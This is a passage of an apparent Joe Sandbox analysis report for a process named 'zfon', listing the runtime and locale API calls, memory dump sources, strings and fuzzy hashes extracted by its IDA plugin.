                                                                                                • API String ID: 3863519203-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3627902316-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 2716750221-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localescodecvtstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3627902316-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 448217422-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesnumpunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 448217422-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmoneypunctstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3095117837-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: ExceptionFacet_RegisterThrow_lock_localesmessagesstd::_std::bad_alloc::bad_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 1958836-0
                                                                                                Similarity
                                                                                                • API ID: _lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 3756862740-0
                                                                                                Similarity
                                                                                                • API ID: _lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 3756862740-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_locale_name_funcfreemallocmemcpywcsnlen
                                                                                                • String ID:
                                                                                                • API String ID: 3567269174-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::locale::_$Setgloballocalesetlocale$InitLocimpLocimp::_New__lock_locales
                                                                                                • String ID:
                                                                                                • API String ID: 2905786255-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25C3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25D3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25E3
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E25F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E6FF4
                                                                                                • ___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E6FFE
                                                                                                  • Part of subcall function 00007FF8B90E9320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E9363
                                                                                                  • Part of subcall function 00007FF8B90E9320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E9388
                                                                                                  • Part of subcall function 00007FF8B90E9320: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8B90E705B), ref: 00007FF8B90E93C8
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF8B90E7021
                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B90E705F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
                                                                                                • String ID:
                                                                                                • API String ID: 3421985146-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6623
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6633
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6643
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E6650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34D0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34E0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34F0
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E34FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970B4F7
                                                                                                  • Part of subcall function 00007FF7F97098A0: memmove.VCRUNTIME140 ref: 00007FF7F9709939
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F970B52C
                                                                                                • SetLastError.KERNEL32 ref: 00007FF7F970B555
                                                                                                • ?_Ios_base_dtor@ios_base@std@@CAXPEAV12@@Z.MSVCP140 ref: 00007FF7F970B58A
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970927A
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970928F
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F970929F
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092AF
                                                                                                  • Part of subcall function 00007FF7F9709270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F9702D11), ref: 00007FF7F97092BC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$V01@$??6?$basic_ostream@D@std@@@std@@ErrorIos_base_dtor@ios_base@std@@LastU?$char_traits@V01@@V12@@cef_string_map_allocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 1591153422-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
                                                                                                • String ID:
                                                                                                • API String ID: 3203701943-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2876
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2886
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E2896
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E28A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 3668304517-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                • String ID:
                                                                                                • API String ID: 2933794660-0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9102F3F
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9102F82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 3668304517-2799312399
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B91033EF
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9103432
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                • API String ID: 3668304517-2799312399
                                                                                                • Opcode ID: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                • Instruction ID: a57cb1b507c83ce564cdb8535fb503ecf1efbe4dd513956cdffaf1dcdec9a8c9
                                                                                                • Opcode Fuzzy Hash: e632bfa2d873c0be3d312fc90208439f941055322aecca706e8eed900dda154e
                                                                                                • Instruction Fuzzy Hash: 5FD1BB22B0CAC28AEB50DF6A94402BD2761FB45BD4F805171DF4E1B7A9DE3EE546E304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@
                                                                                                • String ID: vector<T> too long
                                                                                                • API String ID: 1004598685-3788999226
                                                                                                • Opcode ID: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                • Instruction ID: bcb7fb21447734aa8fa0349fa752bd0394f7048a2ba9045c3ccde8450926d5de
                                                                                                • Opcode Fuzzy Hash: fd96c43c9ae9a7940df19a78275077a50898266131be15fa7121a827a308b9e3
                                                                                                • Instruction Fuzzy Hash: 7DB1BE22B18B8585EF24DFA5D9502ECA371FB48BD8F898132DE2D57798DF38E4458390
                                                                                                APIs
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B910D5F4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                • String ID: %.0Lf$0123456789-
                                                                                                • API String ID: 3668304517-3094241602
                                                                                                • Opcode ID: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                • Instruction ID: bd690f246ca3a14500c1bee8dfeabd4716422e83c55f1c73b885387a1502d07c
                                                                                                • Opcode Fuzzy Hash: c075ca733a5e2985d7409c734a112bdb889e844c53dbfec16932d9e1d86b165b
                                                                                                • Instruction Fuzzy Hash: 68815526B08B859AEB10CF69D4402AC23B1FB48B88F408136DF4E67BA8DF3CE555D354
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritableUnwind
                                                                                                • String ID: csm
                                                                                                • API String ID: 451473138-1018135373
                                                                                                • Opcode ID: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                • Instruction ID: 79f28e0f00c28de9eff84a569dc7887bc44b9a5b88b41285033acac8f76b6727
                                                                                                • Opcode Fuzzy Hash: e4c021b48a88740338c5921ea959046dd8c7dfd39424219a23c6621b5fb580c7
                                                                                                • Instruction Fuzzy Hash: E351AE36A196028AEB549BA9E464A39B7A2FB44BD8F148531DF4A47788DF7CF841C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturnswprintf_s
                                                                                                • String ID: %.0Lf
                                                                                                • API String ID: 296878162-1402515088
                                                                                                • Opcode ID: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                • Instruction ID: d3de339d7ea4a6341e3f0925ae61929c85a69c9e7bbce919b1862f2ebb0b7974
                                                                                                • Opcode Fuzzy Hash: 989814ed0aab853247327d7537572a65def7191e538b3b40b3089a5dc173ab06
                                                                                                • Instruction Fuzzy Hash: B2515B62B19F8595EB01DF69E8402AD6370AB89BD4F504232DF5D27BA9EF3CD046D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: abort$CreateFrameInfo
                                                                                                • String ID: csm
                                                                                                • API String ID: 2697087660-1018135373
                                                                                                • Opcode ID: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                • Instruction ID: e20a8f4130404b7c95f8e0b0e610f20c3e744ab593ab0e119664c2388309b977
                                                                                                • Opcode Fuzzy Hash: 97157617618e05fe8c8104398669bc63cc419c1e3435ae2751fdc288269851fb
                                                                                                • Instruction Fuzzy Hash: 31514833A1975286E660AB6AE45026E77A4FB89BE5F141138EB8D07B55CF3CF461CB00
                                                                                                APIs
                                                                                                • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF7F96E457A,?,?,?,?,?,00007FF7F96E3EB6), ref: 00007FF7F96E4334
                                                                                                • memcpy.VCRUNTIME140(?,?,?,00007FF7F96E457A,?,?,?,?,?,00007FF7F96E3EB6), ref: 00007FF7F96E43B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Xlength_error@std@@memcpy
                                                                                                • String ID: string too long
                                                                                                • API String ID: 237780522-2556327735
                                                                                                • Opcode ID: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                • Instruction ID: ce538dcd645fdaae83ee90136e0f5c8baa17c579643af84e3ac1a2916a782c11
                                                                                                • Opcode Fuzzy Hash: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                • Instruction Fuzzy Hash: EC31A021B18A4281DF15AF26E94403CB272FB88FD4B985131CE3D87BDCDE2DE45183A9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Strftime_invalid_parameter_noinfo_noreturn
                                                                                                • String ID: !%x
                                                                                                • API String ID: 1195835417-1893981228
                                                                                                • Opcode ID: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                • Instruction ID: ab6ce746f4bee450f945f7097fa7b7fd01be170b3dda4ed02e61b8d1b46e8948
                                                                                                • Opcode Fuzzy Hash: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                • Instruction Fuzzy Hash: E6415A62B08AC1AEEB119FB9D4103ED2771AB58798F408622DF9C17B9AEE38D145D350
                                                                                                APIs
                                                                                                Strings
